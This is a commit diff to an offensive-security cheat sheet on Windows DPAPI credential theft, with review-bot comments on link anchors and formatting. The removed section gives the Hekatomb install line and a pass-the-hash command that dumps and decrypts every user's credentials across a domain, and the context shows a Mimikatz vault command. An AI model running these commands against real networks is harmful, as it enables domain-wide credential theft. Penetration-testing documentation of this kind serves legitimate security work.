DPAPI - Data Protection API

This commit is contained in:
Swissky
2022-09-23 00:35:34 +02:00
parent 6b76c452a7
commit 2d30e22121
5 changed files with 145 additions and 49 deletions


@@ -14,7 +14,6 @@
* [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials)
* [Vault](#vault)
* [Hekatomb - Steal all credentials on domain](#hekatomb---Steal-all-credentials-on-domain)
* [Mimikatz - Commands list](#mimikatz---commands-list)
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
* [References](#references)
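Review bot: the table-of-contents entry being dropped here, `#hekatomb---Steal-all-credentials-on-domain`, never resolved in the first place, since GitHub lowercases heading slugs and the other entries in this list (`#mimikatz---commands-list`, `#mimikatz---powershell-version`) follow that convention; removing it is therefore safe, but if the Hekatomb section is being relocated rather than deleted outright (the commit touches 5 files with 145 additions, yet the message "DPAPI - Data Protection API" says nothing about a move), the new location should get a correctly lowercased anchor, e.g. `#hekatomb---steal-all-credentials-on-domain`, and the commit message should state where the section went.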
@@ -236,24 +235,6 @@ Attributes : 0
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
```
### Hekatomb - Steal all credentials on domain
> Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations.
> Then it will download all DPAPI blob of all users from all computers.
> Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
```python
pip3 install hekatomb
hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
```
<a href="https://github.com/Processus-Thief/HEKATOMB">https://github.com/Processus-Thief/HEKATOMB</a>
![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png)
## Mimikatz - Commands list
| Command |Definition|
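Review bot: the section removed in this hunk had a fence tagged ```` ```python ```` around what are shell commands (`pip3 install hekatomb`, `hekatomb -hashes ... -debug -dnstcp`), a raw `<a href=...>` where a Markdown link `[HEKATOMB](https://github.com/Processus-Thief/HEKATOMB)` would match the rest of the file, and an image alt text ("Data in memory") that does not describe a screenshot of the tool's GitHub README; if this content is being moved into one of the other changed files, those three should be corrected at the destination rather than carried over verbatim. Also confirm that the remaining context, the closing ```` ``` ```` of the `vault::cred` block followed directly by `## Mimikatz - Commands list`, keeps a blank line between them so the heading still renders.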